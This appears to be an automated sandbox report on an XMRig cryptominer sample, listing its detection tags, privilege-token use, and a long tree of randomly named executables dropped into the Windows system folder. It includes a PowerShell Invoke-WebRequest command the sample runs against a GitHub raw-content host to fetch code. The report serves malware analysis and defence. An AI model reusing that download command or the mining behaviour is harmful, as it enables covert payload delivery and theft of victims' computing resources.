Malware Analysis Report

2025-01-06 15:42

Sample ID 240525-tlb3ssae37
Target 7283d55cf2c83e95324ff585e4cba837_JaffaCakes118
SHA256 cedebea0eaa0721bdfddb834db392719b52a69d1434a66da45f8897914396314
Tags upx miner xmrig execution
Score 10/10

Analysis Overview

Threat Level: Known bad

The file 7283d55cf2c83e95324ff585e4cba837_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

upx miner xmrig execution

xmrig

XMRig Miner payload

Xmrig family

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Executes dropped EXE

Loads dropped DLL

UPX packed file

Legitimate hosting services abused for malware hosting/C2

Drops file in Windows directory

Unsigned PE

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-25 16:08

Signatures

XMRig Miner payload

miner

Xmrig family

xmrig

UPX packed file

upx

Unsigned PE


Analysis: behavioral1

Detonation Overview

Submitted

2024-05-25 16:08

Reported

2024-05-25 16:10

Platform

win7-20240215-en

Max time kernel

150s

Max time network

145s

Command Line

"C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE


Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A

UPX packed file

upx

Drops file in Windows directory


Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory


Processes

C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "


C:\Windows\System\ZZYpJDG.exe

C:\Windows\System\HTMLqID.exe

C:\Windows\System\HTMLqID.exe

C:\Windows\System\krZQQiq.exe

C:\Windows\System\krZQQiq.exe

C:\Windows\System\QqctqeI.exe

C:\Windows\System\QqctqeI.exe

C:\Windows\System\bYbnSdh.exe

C:\Windows\System\bYbnSdh.exe

C:\Windows\System\iWKzWuz.exe

C:\Windows\System\iWKzWuz.exe

C:\Windows\System\zhMsDmc.exe

C:\Windows\System\zhMsDmc.exe

C:\Windows\System\pyXqLnw.exe

C:\Windows\System\pyXqLnw.exe

C:\Windows\System\ZHEwIKi.exe

C:\Windows\System\ZHEwIKi.exe

C:\Windows\System\GOhOzij.exe

C:\Windows\System\GOhOzij.exe

C:\Windows\System\rKQTeYH.exe

C:\Windows\System\rKQTeYH.exe

C:\Windows\System\rityzKa.exe

C:\Windows\System\rityzKa.exe

C:\Windows\System\yFhiVRN.exe

C:\Windows\System\yFhiVRN.exe

C:\Windows\System\VCuPpez.exe

C:\Windows\System\VCuPpez.exe

C:\Windows\System\iwQdpqw.exe

C:\Windows\System\iwQdpqw.exe

C:\Windows\System\tnjYSaC.exe

C:\Windows\System\tnjYSaC.exe

C:\Windows\System\YkLWwcL.exe

C:\Windows\System\YkLWwcL.exe

C:\Windows\System\NeqOnVH.exe

C:\Windows\System\NeqOnVH.exe

C:\Windows\System\bHOngCm.exe

C:\Windows\System\bHOngCm.exe

C:\Windows\System\uOZeKVF.exe

C:\Windows\System\uOZeKVF.exe

C:\Windows\System\ZpCJiQq.exe

C:\Windows\System\ZpCJiQq.exe

C:\Windows\System\KCqlKQe.exe

C:\Windows\System\KCqlKQe.exe

C:\Windows\System\OHLIhKZ.exe

C:\Windows\System\OHLIhKZ.exe

C:\Windows\System\btPVlPS.exe

C:\Windows\System\btPVlPS.exe

C:\Windows\System\aKftMEX.exe

C:\Windows\System\aKftMEX.exe

C:\Windows\System\MXDtfnB.exe

C:\Windows\System\MXDtfnB.exe

C:\Windows\System\UmEIzYQ.exe

C:\Windows\System\UmEIzYQ.exe

C:\Windows\System\MPzOIQH.exe

C:\Windows\System\MPzOIQH.exe

C:\Windows\System\LBukKgf.exe

C:\Windows\System\LBukKgf.exe

C:\Windows\System\fspBWTD.exe

C:\Windows\System\fspBWTD.exe

C:\Windows\System\oYYVOua.exe

C:\Windows\System\oYYVOua.exe

C:\Windows\System\UfTxeUP.exe

C:\Windows\System\UfTxeUP.exe

C:\Windows\System\JiWRszz.exe

C:\Windows\System\JiWRszz.exe

C:\Windows\System\naDrIMz.exe

C:\Windows\System\naDrIMz.exe

C:\Windows\System\oUBPAPv.exe

C:\Windows\System\oUBPAPv.exe

C:\Windows\System\tquUTmz.exe

C:\Windows\System\tquUTmz.exe

C:\Windows\System\fpUnTzj.exe

C:\Windows\System\fpUnTzj.exe

C:\Windows\System\VTNNpMM.exe

C:\Windows\System\VTNNpMM.exe

C:\Windows\System\WiVxiSd.exe

C:\Windows\System\WiVxiSd.exe

C:\Windows\System\bNKAxyg.exe

C:\Windows\System\bNKAxyg.exe

C:\Windows\System\fqYlNeu.exe

C:\Windows\System\fqYlNeu.exe

C:\Windows\System\EzZZWpv.exe

C:\Windows\System\EzZZWpv.exe

C:\Windows\System\YMXtrRA.exe

C:\Windows\System\YMXtrRA.exe

C:\Windows\System\RGyIiQh.exe

C:\Windows\System\RGyIiQh.exe

C:\Windows\System\ifmxnQs.exe

C:\Windows\System\ifmxnQs.exe

C:\Windows\System\DRobVYl.exe

C:\Windows\System\DRobVYl.exe

C:\Windows\System\hcvrKux.exe

C:\Windows\System\hcvrKux.exe

C:\Windows\System\rEmAcot.exe

C:\Windows\System\rEmAcot.exe

C:\Windows\System\xfAqZGT.exe

C:\Windows\System\xfAqZGT.exe

C:\Windows\System\GkbpUMg.exe

C:\Windows\System\GkbpUMg.exe

C:\Windows\System\cxxBGhk.exe

C:\Windows\System\cxxBGhk.exe

C:\Windows\System\MTSwqlu.exe

C:\Windows\System\MTSwqlu.exe

C:\Windows\System\TIpbCzm.exe

C:\Windows\System\TIpbCzm.exe

C:\Windows\System\naivDdQ.exe

C:\Windows\System\naivDdQ.exe

C:\Windows\System\JhCbqVJ.exe

C:\Windows\System\JhCbqVJ.exe

C:\Windows\System\xuEpJqO.exe

C:\Windows\System\xuEpJqO.exe

C:\Windows\System\TjYHpiE.exe

C:\Windows\System\TjYHpiE.exe

C:\Windows\System\xipySoa.exe

C:\Windows\System\xipySoa.exe

C:\Windows\System\icvUzwk.exe

C:\Windows\System\icvUzwk.exe

C:\Windows\System\zdjHxlJ.exe

C:\Windows\System\zdjHxlJ.exe

C:\Windows\System\NLNKUDm.exe

C:\Windows\System\NLNKUDm.exe

C:\Windows\System\jmbUZAU.exe

C:\Windows\System\jmbUZAU.exe

C:\Windows\System\vGiFguG.exe

C:\Windows\System\vGiFguG.exe

C:\Windows\System\siAaPtj.exe

C:\Windows\System\siAaPtj.exe

C:\Windows\System\rXKRXXt.exe

C:\Windows\System\rXKRXXt.exe

C:\Windows\System\GtXGsFa.exe

C:\Windows\System\GtXGsFa.exe

C:\Windows\System\uZoxdYV.exe

C:\Windows\System\uZoxdYV.exe

C:\Windows\System\khqnACV.exe

C:\Windows\System\khqnACV.exe

C:\Windows\System\zhTCpIQ.exe

C:\Windows\System\zhTCpIQ.exe

C:\Windows\System\PTTofAD.exe

C:\Windows\System\PTTofAD.exe

C:\Windows\System\bjJcVNu.exe

C:\Windows\System\bjJcVNu.exe

C:\Windows\System\BnSRbmm.exe

C:\Windows\System\BnSRbmm.exe

C:\Windows\System\iUSOySf.exe

C:\Windows\System\iUSOySf.exe

C:\Windows\System\ctaFZpr.exe

C:\Windows\System\ctaFZpr.exe

C:\Windows\System\coSMDzz.exe

C:\Windows\System\coSMDzz.exe

C:\Windows\System\wxwLUhs.exe

C:\Windows\System\wxwLUhs.exe

C:\Windows\System\QrZEypg.exe

C:\Windows\System\QrZEypg.exe

C:\Windows\System\GvsUMNP.exe

C:\Windows\System\GvsUMNP.exe

C:\Windows\System\nGVXhJd.exe

C:\Windows\System\nGVXhJd.exe

C:\Windows\System\IoVaLOB.exe

C:\Windows\System\IoVaLOB.exe

C:\Windows\System\mZjUBYC.exe

C:\Windows\System\mZjUBYC.exe

C:\Windows\System\BtzSdCK.exe

C:\Windows\System\BtzSdCK.exe

C:\Windows\System\BKwkbGO.exe

C:\Windows\System\BKwkbGO.exe

C:\Windows\System\upfyPra.exe

C:\Windows\System\upfyPra.exe

C:\Windows\System\zAoxdFC.exe

C:\Windows\System\zAoxdFC.exe

C:\Windows\System\jFoMvSF.exe

C:\Windows\System\jFoMvSF.exe

C:\Windows\System\hbIqxkA.exe

C:\Windows\System\hbIqxkA.exe

C:\Windows\System\hUmKuyG.exe

C:\Windows\System\hUmKuyG.exe

C:\Windows\System\nKBNRSf.exe

C:\Windows\System\nKBNRSf.exe

C:\Windows\System\ldnZiYx.exe

C:\Windows\System\ldnZiYx.exe

C:\Windows\System\piXefdk.exe

C:\Windows\System\piXefdk.exe

C:\Windows\System\JoWcXKA.exe

C:\Windows\System\JoWcXKA.exe

C:\Windows\System\eMYbYih.exe

C:\Windows\System\eMYbYih.exe

C:\Windows\System\BkFkJeu.exe

C:\Windows\System\BkFkJeu.exe

C:\Windows\System\qOhCWDS.exe

C:\Windows\System\qOhCWDS.exe

C:\Windows\System\RyHXcrP.exe

C:\Windows\System\RyHXcrP.exe

C:\Windows\System\HcZsTtp.exe

C:\Windows\System\HcZsTtp.exe

C:\Windows\System\KkgpPak.exe

C:\Windows\System\KkgpPak.exe

C:\Windows\System\vuRnvyw.exe

C:\Windows\System\vuRnvyw.exe

C:\Windows\System\YUPohhc.exe

C:\Windows\System\YUPohhc.exe

C:\Windows\System\tQCDMRy.exe

C:\Windows\System\tQCDMRy.exe

C:\Windows\System\YHajnzo.exe

C:\Windows\System\YHajnzo.exe

C:\Windows\System\uzAYVyQ.exe

C:\Windows\System\uzAYVyQ.exe

C:\Windows\System\SpfxuvM.exe

C:\Windows\System\SpfxuvM.exe

C:\Windows\System\SVZZPlI.exe

C:\Windows\System\SVZZPlI.exe

C:\Windows\System\hZthwOL.exe

C:\Windows\System\hZthwOL.exe

C:\Windows\System\UZsvwnp.exe

C:\Windows\System\UZsvwnp.exe

C:\Windows\System\HeyElVa.exe

C:\Windows\System\HeyElVa.exe

C:\Windows\System\BZKVOdw.exe

C:\Windows\System\BZKVOdw.exe

C:\Windows\System\JHQjCRv.exe

C:\Windows\System\JHQjCRv.exe

C:\Windows\System\UwftOEl.exe

C:\Windows\System\UwftOEl.exe

C:\Windows\System\FvvdowM.exe

C:\Windows\System\FvvdowM.exe

C:\Windows\System\FlGjJkZ.exe

C:\Windows\System\FlGjJkZ.exe

C:\Windows\System\qPhLGTU.exe

C:\Windows\System\qPhLGTU.exe

C:\Windows\System\bVhRsmg.exe

C:\Windows\System\bVhRsmg.exe

C:\Windows\System\fkAhznj.exe

C:\Windows\System\fkAhznj.exe

C:\Windows\System\fpRzkDm.exe

C:\Windows\System\fpRzkDm.exe

C:\Windows\System\MkIgvqk.exe

C:\Windows\System\MkIgvqk.exe

C:\Windows\System\sGfcvgi.exe

C:\Windows\System\sGfcvgi.exe

C:\Windows\System\vlzwfpT.exe

C:\Windows\System\vlzwfpT.exe

C:\Windows\System\aJhHCIp.exe

C:\Windows\System\aJhHCIp.exe

C:\Windows\System\TqHbgoS.exe

C:\Windows\System\TqHbgoS.exe

C:\Windows\System\WMtAvlo.exe

C:\Windows\System\WMtAvlo.exe

C:\Windows\System\JLrouUw.exe

C:\Windows\System\JLrouUw.exe

C:\Windows\System\oiPaypj.exe

C:\Windows\System\oiPaypj.exe

C:\Windows\System\GrtTWBq.exe

C:\Windows\System\GrtTWBq.exe

C:\Windows\System\aGufytt.exe

C:\Windows\System\aGufytt.exe

C:\Windows\System\frTZXyT.exe

C:\Windows\System\frTZXyT.exe

C:\Windows\System\qevnBPR.exe

C:\Windows\System\qevnBPR.exe

C:\Windows\System\mSkSZvB.exe

C:\Windows\System\mSkSZvB.exe

C:\Windows\System\XYaQHRw.exe

C:\Windows\System\XYaQHRw.exe

C:\Windows\System\Kvmgyts.exe

C:\Windows\System\Kvmgyts.exe

C:\Windows\System\nOzqFRW.exe

C:\Windows\System\nOzqFRW.exe

C:\Windows\System\phsvILE.exe

C:\Windows\System\phsvILE.exe

C:\Windows\System\DpspqiL.exe

C:\Windows\System\DpspqiL.exe

C:\Windows\System\UOrJsTY.exe

C:\Windows\System\UOrJsTY.exe

C:\Windows\System\kGeqRpi.exe

C:\Windows\System\kGeqRpi.exe

C:\Windows\System\eppxaRK.exe

C:\Windows\System\eppxaRK.exe

C:\Windows\System\XDCMkZp.exe

C:\Windows\System\XDCMkZp.exe

C:\Windows\System\rhqjKEv.exe

C:\Windows\System\rhqjKEv.exe

C:\Windows\System\TxqTefO.exe

C:\Windows\System\TxqTefO.exe

C:\Windows\System\xVZjusz.exe

C:\Windows\System\xVZjusz.exe

C:\Windows\System\kEMGYTw.exe

C:\Windows\System\kEMGYTw.exe

C:\Windows\System\cEobGEE.exe

C:\Windows\System\cEobGEE.exe

C:\Windows\System\fQCQbPK.exe

C:\Windows\System\fQCQbPK.exe

C:\Windows\System\OrZyEug.exe

C:\Windows\System\OrZyEug.exe

C:\Windows\System\WqOgHhk.exe

C:\Windows\System\WqOgHhk.exe

C:\Windows\System\MAogBtr.exe

C:\Windows\System\MAogBtr.exe

C:\Windows\System\pbTSSEl.exe

C:\Windows\System\pbTSSEl.exe

C:\Windows\System\SyumXPi.exe

C:\Windows\System\SyumXPi.exe

C:\Windows\System\kobqjRT.exe

C:\Windows\System\kobqjRT.exe

C:\Windows\System\wXLwVTV.exe

C:\Windows\System\wXLwVTV.exe

C:\Windows\System\mCuvCEB.exe

C:\Windows\System\mCuvCEB.exe

C:\Windows\System\NOrfTHZ.exe

C:\Windows\System\NOrfTHZ.exe

C:\Windows\System\tIooAqV.exe

C:\Windows\System\tIooAqV.exe

C:\Windows\System\gewIOTt.exe

C:\Windows\System\gewIOTt.exe

C:\Windows\System\uryVLdb.exe

C:\Windows\System\uryVLdb.exe

C:\Windows\System\daMSUdH.exe

C:\Windows\System\daMSUdH.exe

C:\Windows\System\HAEAPEI.exe

C:\Windows\System\HAEAPEI.exe

C:\Windows\System\mMcrnjW.exe

C:\Windows\System\mMcrnjW.exe

C:\Windows\System\cdQZLWD.exe

C:\Windows\System\cdQZLWD.exe

C:\Windows\System\dVJXgNE.exe

C:\Windows\System\dVJXgNE.exe

C:\Windows\System\ZmllzVW.exe

C:\Windows\System\ZmllzVW.exe

C:\Windows\System\tgzSwlD.exe

C:\Windows\System\tgzSwlD.exe

C:\Windows\System\MbtHIQY.exe

C:\Windows\System\MbtHIQY.exe

C:\Windows\System\qtqcEFa.exe

C:\Windows\System\qtqcEFa.exe

C:\Windows\System\mNPoOcX.exe

C:\Windows\System\mNPoOcX.exe

C:\Windows\System\CEofRBv.exe

C:\Windows\System\CEofRBv.exe

C:\Windows\System\vjNumov.exe

C:\Windows\System\vjNumov.exe

C:\Windows\System\dCOBXOa.exe

C:\Windows\System\dCOBXOa.exe

C:\Windows\System\WfkMlJf.exe

C:\Windows\System\WfkMlJf.exe

C:\Windows\System\AzqrFuY.exe

C:\Windows\System\AzqrFuY.exe

C:\Windows\System\DfMWTEk.exe

C:\Windows\System\DfMWTEk.exe

C:\Windows\System\Ruqhqxf.exe

C:\Windows\System\Ruqhqxf.exe

C:\Windows\System\DnApkUJ.exe

C:\Windows\System\DnApkUJ.exe

C:\Windows\System\CxUsacO.exe

C:\Windows\System\CxUsacO.exe

C:\Windows\System\qNufNJg.exe

C:\Windows\System\qNufNJg.exe

C:\Windows\System\HVfuHHo.exe

C:\Windows\System\HVfuHHo.exe

C:\Windows\System\tikZRjs.exe

C:\Windows\System\tikZRjs.exe

C:\Windows\System\NapopCB.exe

C:\Windows\System\NapopCB.exe

C:\Windows\System\IiClgVY.exe

C:\Windows\System\IiClgVY.exe

C:\Windows\System\ebiajMZ.exe

C:\Windows\System\ebiajMZ.exe

C:\Windows\System\DSuyZJj.exe

C:\Windows\System\DSuyZJj.exe

C:\Windows\System\urossLg.exe

C:\Windows\System\urossLg.exe

C:\Windows\System\oZWDbKI.exe

C:\Windows\System\oZWDbKI.exe

C:\Windows\System\WBOwICi.exe

C:\Windows\System\WBOwICi.exe

C:\Windows\System\lAmSoiN.exe

C:\Windows\System\lAmSoiN.exe

C:\Windows\System\hyPYjPU.exe

C:\Windows\System\hyPYjPU.exe

C:\Windows\System\kZJbvSW.exe

C:\Windows\System\kZJbvSW.exe

C:\Windows\System\rFRwnNa.exe

C:\Windows\System\rFRwnNa.exe

C:\Windows\System\RyDprhj.exe

C:\Windows\System\RyDprhj.exe

C:\Windows\System\TnfcqJu.exe

C:\Windows\System\TnfcqJu.exe

C:\Windows\System\oPQrnWL.exe

C:\Windows\System\oPQrnWL.exe

C:\Windows\System\xnKPzLO.exe

C:\Windows\System\xnKPzLO.exe

C:\Windows\System\CUbeoap.exe

C:\Windows\System\CUbeoap.exe

C:\Windows\System\tJufVsj.exe

C:\Windows\System\tJufVsj.exe

C:\Windows\System\rrBWkDv.exe

C:\Windows\System\rrBWkDv.exe

C:\Windows\System\GtIuGJC.exe

C:\Windows\System\GtIuGJC.exe

C:\Windows\System\vWoTIcb.exe

C:\Windows\System\vWoTIcb.exe

C:\Windows\System\YOGxcyc.exe

C:\Windows\System\YOGxcyc.exe

C:\Windows\System\AqVNLPJ.exe

C:\Windows\System\AqVNLPJ.exe

C:\Windows\System\lYIFNog.exe

C:\Windows\System\lYIFNog.exe

C:\Windows\System\dYCeleH.exe

C:\Windows\System\dYCeleH.exe

C:\Windows\System\ZULxDLL.exe

C:\Windows\System\ZULxDLL.exe

C:\Windows\System\tnEWsvH.exe

C:\Windows\System\tnEWsvH.exe

C:\Windows\System\OFhFtiJ.exe

C:\Windows\System\OFhFtiJ.exe

C:\Windows\System\RVTpNJv.exe

C:\Windows\System\RVTpNJv.exe

C:\Windows\System\vEYmnQF.exe

C:\Windows\System\vEYmnQF.exe

C:\Windows\System\WlULZLs.exe

C:\Windows\System\WlULZLs.exe

C:\Windows\System\CZADWPd.exe

C:\Windows\System\CZADWPd.exe

C:\Windows\System\UBbnKgH.exe

C:\Windows\System\UBbnKgH.exe

C:\Windows\System\FOxpCbG.exe

C:\Windows\System\FOxpCbG.exe

C:\Windows\System\zOLPNsP.exe

C:\Windows\System\zOLPNsP.exe

C:\Windows\System\HYnewYY.exe

C:\Windows\System\HYnewYY.exe

C:\Windows\System\PUGqzXd.exe

C:\Windows\System\PUGqzXd.exe

C:\Windows\System\PhcGrtb.exe

C:\Windows\System\PhcGrtb.exe

C:\Windows\System\TJSTzaA.exe

C:\Windows\System\TJSTzaA.exe

C:\Windows\System\hjhsjMs.exe

C:\Windows\System\hjhsjMs.exe

C:\Windows\System\jsFncuy.exe

C:\Windows\System\jsFncuy.exe

C:\Windows\System\MedbBrY.exe

C:\Windows\System\MedbBrY.exe

C:\Windows\System\VSRZVOI.exe

C:\Windows\System\VSRZVOI.exe

C:\Windows\System\YNGyuXZ.exe

C:\Windows\System\YNGyuXZ.exe

C:\Windows\System\oxkDOcV.exe

C:\Windows\System\oxkDOcV.exe

C:\Windows\System\YnWiMJB.exe

C:\Windows\System\YnWiMJB.exe

C:\Windows\System\CWaFUPr.exe

C:\Windows\System\CWaFUPr.exe

C:\Windows\System\EFPyYdT.exe

C:\Windows\System\EFPyYdT.exe

C:\Windows\System\lnEXmAd.exe

C:\Windows\System\lnEXmAd.exe

C:\Windows\System\weabufz.exe

C:\Windows\System\weabufz.exe

C:\Windows\System\eCJUxpd.exe

C:\Windows\System\eCJUxpd.exe

C:\Windows\System\yLWIZXJ.exe

C:\Windows\System\yLWIZXJ.exe

C:\Windows\System\KGbsmXl.exe

C:\Windows\System\KGbsmXl.exe

C:\Windows\System\GDTiqEl.exe

C:\Windows\System\GDTiqEl.exe

C:\Windows\System\HhkrYLo.exe

C:\Windows\System\HhkrYLo.exe

C:\Windows\System\KXfitzv.exe

C:\Windows\System\KXfitzv.exe

C:\Windows\System\TbwMPWy.exe

C:\Windows\System\TbwMPWy.exe

C:\Windows\System\aDdpYPD.exe

C:\Windows\System\aDdpYPD.exe

C:\Windows\System\GpnzSgm.exe

C:\Windows\System\GpnzSgm.exe

C:\Windows\System\PzofXer.exe

C:\Windows\System\PzofXer.exe

C:\Windows\System\vOJwgaP.exe

C:\Windows\System\vOJwgaP.exe

C:\Windows\System\sLrqOzf.exe

C:\Windows\System\sLrqOzf.exe

C:\Windows\System\neKhhvo.exe

C:\Windows\System\neKhhvo.exe

C:\Windows\System\bGvpKNH.exe

C:\Windows\System\bGvpKNH.exe

C:\Windows\System\MJfPPQC.exe

C:\Windows\System\MJfPPQC.exe

C:\Windows\System\oyhPmXh.exe

C:\Windows\System\oyhPmXh.exe

C:\Windows\System\oydOycW.exe

C:\Windows\System\oydOycW.exe

C:\Windows\System\KRCQIor.exe

C:\Windows\System\KRCQIor.exe

C:\Windows\System\HGusOoy.exe

C:\Windows\System\HGusOoy.exe

C:\Windows\System\VuqdiVw.exe

C:\Windows\System\VuqdiVw.exe

C:\Windows\System\VeqtVjb.exe

C:\Windows\System\VeqtVjb.exe

C:\Windows\System\kAuePFU.exe

C:\Windows\System\kAuePFU.exe

C:\Windows\System\SDyPwag.exe

C:\Windows\System\SDyPwag.exe

C:\Windows\System\nOCusVB.exe

C:\Windows\System\nOCusVB.exe

C:\Windows\System\DfZZNno.exe

C:\Windows\System\DfZZNno.exe

C:\Windows\System\PyZYfRy.exe

C:\Windows\System\PyZYfRy.exe

C:\Windows\System\JVBglrU.exe

C:\Windows\System\JVBglrU.exe

C:\Windows\System\SLHQyGL.exe

C:\Windows\System\SLHQyGL.exe

C:\Windows\System\fSDildZ.exe

C:\Windows\System\fSDildZ.exe

C:\Windows\System\MghUjEL.exe

C:\Windows\System\MghUjEL.exe

C:\Windows\System\vDHHGTX.exe

C:\Windows\System\vDHHGTX.exe

C:\Windows\System\vehZMvg.exe

C:\Windows\System\vehZMvg.exe

C:\Windows\System\ALAzgWQ.exe

C:\Windows\System\ALAzgWQ.exe

C:\Windows\System\VjLjLPi.exe

C:\Windows\System\VjLjLPi.exe

C:\Windows\System\YTJZAoL.exe

C:\Windows\System\YTJZAoL.exe

C:\Windows\System\ERhqSus.exe

C:\Windows\System\ERhqSus.exe

C:\Windows\System\XQgLxKe.exe

C:\Windows\System\XQgLxKe.exe

C:\Windows\System\MzcPyTW.exe

C:\Windows\System\MzcPyTW.exe

C:\Windows\System\sfdCmwj.exe

C:\Windows\System\sfdCmwj.exe

C:\Windows\System\gwICoVh.exe

C:\Windows\System\gwICoVh.exe

C:\Windows\System\MhbCUYv.exe

C:\Windows\System\MhbCUYv.exe

C:\Windows\System\cfsugMw.exe

C:\Windows\System\cfsugMw.exe

C:\Windows\System\rivuQOJ.exe

C:\Windows\System\rivuQOJ.exe

C:\Windows\System\bwlFGZO.exe

C:\Windows\System\bwlFGZO.exe

C:\Windows\System\jvJFIFX.exe

C:\Windows\System\jvJFIFX.exe

C:\Windows\System\meAESyi.exe

C:\Windows\System\meAESyi.exe

C:\Windows\System\pAvEumc.exe

C:\Windows\System\pAvEumc.exe

C:\Windows\System\TlYhwJO.exe

C:\Windows\System\TlYhwJO.exe

C:\Windows\System\KgAFKKA.exe

C:\Windows\System\KgAFKKA.exe

C:\Windows\System\XlPEgdO.exe

C:\Windows\System\XlPEgdO.exe

C:\Windows\System\SUaqRaa.exe

C:\Windows\System\SUaqRaa.exe

C:\Windows\System\VzLJGRR.exe

C:\Windows\System\VzLJGRR.exe

C:\Windows\System\SBOrJDk.exe

C:\Windows\System\SBOrJDk.exe

C:\Windows\System\ioLLwCK.exe

C:\Windows\System\ioLLwCK.exe

C:\Windows\System\jJROICF.exe

C:\Windows\System\jJROICF.exe

C:\Windows\System\kPNFRQU.exe

C:\Windows\System\kPNFRQU.exe

C:\Windows\System\BEmAwJj.exe

C:\Windows\System\BEmAwJj.exe

C:\Windows\System\wCDCphQ.exe

C:\Windows\System\wCDCphQ.exe

C:\Windows\System\CKEycFO.exe

C:\Windows\System\CKEycFO.exe

C:\Windows\System\pMuPEJm.exe

C:\Windows\System\pMuPEJm.exe

C:\Windows\System\Hqbrcwg.exe

C:\Windows\System\Hqbrcwg.exe

C:\Windows\System\sOzeNje.exe

C:\Windows\System\sOzeNje.exe

C:\Windows\System\bTFPGqa.exe

C:\Windows\System\bTFPGqa.exe

C:\Windows\System\lllutCE.exe

C:\Windows\System\lllutCE.exe

C:\Windows\System\woCNxfF.exe

C:\Windows\System\woCNxfF.exe

C:\Windows\System\UAdGzwB.exe

C:\Windows\System\UAdGzwB.exe

C:\Windows\System\LuZMLsh.exe

C:\Windows\System\LuZMLsh.exe

C:\Windows\System\uCzRRFG.exe

C:\Windows\System\uCzRRFG.exe

C:\Windows\System\RqySbtt.exe

C:\Windows\System\RqySbtt.exe

C:\Windows\System\qvanhFE.exe

C:\Windows\System\qvanhFE.exe

C:\Windows\System\pRuWwfm.exe

C:\Windows\System\pRuWwfm.exe

C:\Windows\System\rXHNjrz.exe

C:\Windows\System\rXHNjrz.exe

C:\Windows\System\IKGJbyI.exe

C:\Windows\System\IKGJbyI.exe

C:\Windows\System\vepycRc.exe

C:\Windows\System\vepycRc.exe

C:\Windows\System\GBQNqdI.exe

C:\Windows\System\GBQNqdI.exe

C:\Windows\System\xICKkXD.exe

C:\Windows\System\xICKkXD.exe

C:\Windows\System\lhVKZzN.exe

C:\Windows\System\lhVKZzN.exe

C:\Windows\System\zXQtLdp.exe

C:\Windows\System\zXQtLdp.exe

C:\Windows\System\CmgvIYE.exe

C:\Windows\System\CmgvIYE.exe

C:\Windows\System\uUEcEhR.exe

C:\Windows\System\uUEcEhR.exe

C:\Windows\System\lyFdepn.exe

C:\Windows\System\lyFdepn.exe

C:\Windows\System\FoiPBBO.exe

C:\Windows\System\FoiPBBO.exe

C:\Windows\System\yxbjpQx.exe

C:\Windows\System\yxbjpQx.exe

C:\Windows\System\snlaPSe.exe

C:\Windows\System\snlaPSe.exe

C:\Windows\System\bBhtuEA.exe

C:\Windows\System\bBhtuEA.exe

C:\Windows\System\HWIxziu.exe

C:\Windows\System\HWIxziu.exe

C:\Windows\System\drpLtGv.exe

C:\Windows\System\drpLtGv.exe

C:\Windows\System\jwbHGfH.exe

C:\Windows\System\jwbHGfH.exe

C:\Windows\System\bFKnyny.exe

C:\Windows\System\bFKnyny.exe

C:\Windows\System\MIjTclo.exe

C:\Windows\System\MIjTclo.exe

C:\Windows\System\kItcGrs.exe

C:\Windows\System\kItcGrs.exe

C:\Windows\System\GWtFlRw.exe

C:\Windows\System\GWtFlRw.exe

C:\Windows\System\ZmmgPQV.exe

C:\Windows\System\ZmmgPQV.exe

C:\Windows\System\gghqmDL.exe

C:\Windows\System\gghqmDL.exe

C:\Windows\System\SnrGTHK.exe

C:\Windows\System\SnrGTHK.exe

C:\Windows\System\IcHVuZZ.exe

C:\Windows\System\IcHVuZZ.exe

C:\Windows\System\UTsxrcD.exe

C:\Windows\System\UTsxrcD.exe

C:\Windows\System\WWOKJYu.exe

C:\Windows\System\WWOKJYu.exe

C:\Windows\System\ofTYLil.exe

C:\Windows\System\ofTYLil.exe

C:\Windows\System\McNLrYm.exe

C:\Windows\System\McNLrYm.exe

C:\Windows\System\EzSfMHw.exe

C:\Windows\System\EzSfMHw.exe

C:\Windows\System\OBaUVNq.exe

C:\Windows\System\OBaUVNq.exe

C:\Windows\System\GcHCYhg.exe

C:\Windows\System\GcHCYhg.exe

C:\Windows\System\qlDOaDH.exe

C:\Windows\System\qlDOaDH.exe

C:\Windows\System\DasuKaS.exe

C:\Windows\System\DasuKaS.exe

C:\Windows\System\BTTtnxA.exe

C:\Windows\System\BTTtnxA.exe

C:\Windows\System\wHNOdgi.exe

C:\Windows\System\wHNOdgi.exe

C:\Windows\System\DsfZjcm.exe

C:\Windows\System\DsfZjcm.exe

C:\Windows\System\PaBVGwj.exe

C:\Windows\System\PaBVGwj.exe

C:\Windows\System\PvuDQmt.exe

C:\Windows\System\PvuDQmt.exe

C:\Windows\System\LSyMOkp.exe

C:\Windows\System\LSyMOkp.exe

C:\Windows\System\AhDTeqL.exe

C:\Windows\System\AhDTeqL.exe

C:\Windows\System\YNSYFiJ.exe

C:\Windows\System\YNSYFiJ.exe

C:\Windows\System\kGyVRpC.exe

C:\Windows\System\kGyVRpC.exe

C:\Windows\System\arQTpfq.exe

C:\Windows\System\arQTpfq.exe

C:\Windows\System\spqRYyd.exe

C:\Windows\System\spqRYyd.exe

C:\Windows\System\PuolSoe.exe

C:\Windows\System\PuolSoe.exe

C:\Windows\System\LUPGwqX.exe

C:\Windows\System\LUPGwqX.exe

C:\Windows\System\tQbvJiO.exe

C:\Windows\System\tQbvJiO.exe

C:\Windows\System\FGsNYvM.exe

